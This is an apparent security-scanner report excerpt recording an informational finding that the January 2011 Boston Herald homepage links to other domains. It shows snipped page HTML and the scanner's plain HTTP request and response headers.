<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128mankins_believes_pats_days_are_over/srvc=home&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="250" width="315" alt="Logan Mankins believes Patriots days are over"></a>
...[SNIP]...
<a href="/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=1"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/18e69eb546_stpDeLeo012811AC.jpg" alt="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=1">
...[SNIP]...
<a href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/89c5b31e64_stpRite012811.jpg" alt="ALL WRONG: Anthony Hopkins and Colin O&#x2019;Donoghue star in &#x2018;The Rite,&#x2019; an &#x2018;Exorcist&#x2019;-inspired thriller."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a
                        href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2">
...[SNIP]...
<a href="/blogs/sports/celtics/"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/b6181f7db3_DieselTEASE.jpg" alt="Paul Pierce and Shaquille O&rsquo;Neal will play tonight in Phoenix. "></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/business/general/view/20110128goldman_sachs_triples_salaries_for_5_top_executives/format=comments&srvc=home&position=recent">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20110128lawrence_officer_convicted_of_rape/format=comments&srvc=home&position=recent">
...[SNIP]...
<a href="/entertainment/arts_culture/view/2011012865-million_spider-man_leaves_broadway_hanging/srvc=home&position=recent"><img class="recentImage" src="http://multimedia.heraldinteractive.com/images/20110128/stp/8df24f_Spidey_01292011.jpg" alt="WEB OF WOES: The highly expensive Broadway musical &lsquo;Spider-Man Turn: Off the Dark&rsquo; has been the victim of bad press, according to director Julie Taymor."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/arts_culture/view/2011012865-million_spider-man_leaves_broadway_hanging/format=comments&srvc=home&position=recent">
...[SNIP]...
<!--// AD CONTAINER //-->
    <IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<a href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/srvc=home&position=4"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" alt="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/format=comments&srvc=home&position=4">
...[SNIP]...
<a href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=5"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Mitt Romney is seen in this April 23, 2009 file photo in Boston.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=5">
...[SNIP]...
<a href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/9ff7e8_ltpBadrabbits012711.jpg" alt="Bad Rabbits">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=6">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6">
...[SNIP]...
<a href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=7"><img
src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a federal marshal.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=7">
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt=""></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active">
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt=""></a>
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Poll">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=emailed">
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div id="next-arrow-container">
<img alt="More" id="SliderMoreButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif" />
</div>
    <div id="prev-arrow-container">
<img alt="Back" id="SliderBackButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif" />
<!--//
<img id="ShadowLeft" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderShadowLeft.png" alt="" />
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg" />
<div class="sliderTitle" style="color:#630">
...[SNIP]...
<a href="/blogs/sports/high_school"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png" />
<!-- <div class="sliderTitle" style="color: #039">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/on_the_t/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordanPres_177x57.gif" /></a>
...[SNIP]...
<li class="SliderItem">
<img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
<a href="http://www.bostonherald.com/search/?topic=scholz&searchSite=recent&x=0&y=0#articleFull"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/shopping/half_price_boston/" style="color:#333; font-weight:bold"><img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/news/police_logs/"><img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/projects/mcas2009?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/users/register?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="/store/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.shoplocal.com/bostonherald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/about/home_delivery/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.collegeanduniversity.net/herald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/mediaBiz/index.php/2011/01/28/the-holiday-radio-ratings-rundown/"><img src="http://cache.heraldinteractive.com/blogs/news/mediaBiz/wp-content/uploads/2011/01/matty2.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/"><img src="http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2011/01/kobe.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant/?p=3065"><img src="http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/live-from-honolulu-logan-mankins-on-the-pats-i-dont-see-them-trying-to-keep-me/"><img src="http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2011/01/mankins-looking-up.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/"><img src="http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2011/01/roof-collapse-in-lynn.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/"><img src="http://cache.heraldinteractive.com/blogs/news/lone_republican/wp-content/uploads/2011/01/deval-82709.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/"><img src="http://multimedia.heraldinteractive.com/images/0075a6139f_ltpvanh10292007.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/lifestyle/fork_lift/?p=3679"><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1170.snc4/154264_180150921996846_120515841293688_635022_7871232_n.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/"><img src="http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2011/01/a76f88_010611crawfordnl111.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312690"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg"></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('galleries/index.php?gallery_id=9','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/front_01282011.jpg" alt="" /></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=10','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/Sports_01282011.jpg" alt="" /></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div>+ <a href="http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE">Money Saving Coupons</a>
...[SNIP]...
<div>+ <a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<div>+ <a href="http://www.people2people.com/?connect=boshrld&amp;page=login">Personals</a>
...[SNIP]...
<div>+ <a href="http://www.shoplocal.com/bostonherald/">Great Shopping&nbsp;Deals</a>
...[SNIP]...
<div>+ <a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<a href="/about/electronic_edition/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg" style="border: 1px #333 solid" /></a>
...[SNIP]...
<a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg" alt="PILING UP: Crews work to clear mounds of snow in Kenmore Square yesterday." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/weather/"><img src="http://cache.heraldinteractive.com/images/siteImages/weather/07.gif" /></a>
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/19.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/02.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/03.gif" width="57" height="48"/><br />
...[SNIP]...
<a
href="/sports/basketball/celtics/view/20110128shaquille_oneal_earns_fresh_shot_eyes_return_tonight_in_phoenix/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/c2ecb2_kev_01282011.jpg" alt="WELL WITHIN REACH: Kevin Garnett tries to slap the ball away from the Trail Blazers&#x2019; LaMarcus Aldridge during last night&#x2019;s 88-78 Celtics victory in Portland." /></a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&amp;page=mlb/teams/028/individual.aspx?team=028">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077">Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121">Ind. Stats</a>
...[SNIP]...
<a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/8345b6_Statham_01282011.jpg" alt="AUTO PILOT: Jason Statham kicks more butt than you can shake a wrench at in &#x2018;The Mechanic,&#x2019; a remake of the Charles Bronson film directed by Michael Winner." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/entertainment/lifestyle/view.bg?articleid=1312514&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/8a420e_ltpSteamB012811.jpg" border="0"
width="207" height="181" caption="Ways to take the chill out of winter" />
</a>
...[SNIP]...
<a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" alt="Harvard&rsquo;s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312321&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110126/d0a387_Padma_01272011.jpg" border="0"
width="207" height="181" caption="Complicated custody battle for Padma Lakshmi" />
</a>
...[SNIP]...
<a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt="" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=also">
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img src="http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif"></a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.homefind.com/?srvc=home&position=also">Homefind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="featuredListHF_logo">
<img src="http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg" />
    </div>
   <span class="bold">
    <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">
1212 North Main Street,<br>
...[SNIP]...
</span>
        <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">View listing</a>
...[SNIP]...
</div>    
<a class="orange" href="http://www.homefind.com">Search Homes</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/post-property/">Post a Property</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/for-agents/">For Agents</a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.carfind.com/?srvc=home&position=also">Carfind</a>
...[SNIP]...
<a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg" alt="The Ford logo is seen on the automaker&rsquo;s headquarters in this Oct. 26, 2009 file photo taken in Dearborn, Mich." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/">Search Cars</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/sellCar.bg">Sell a Car</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp">Find a dealer</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

7.10. http://www.bostonherald.com/index.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /index.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.bg?srvc=home&tab=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:13:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 157225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
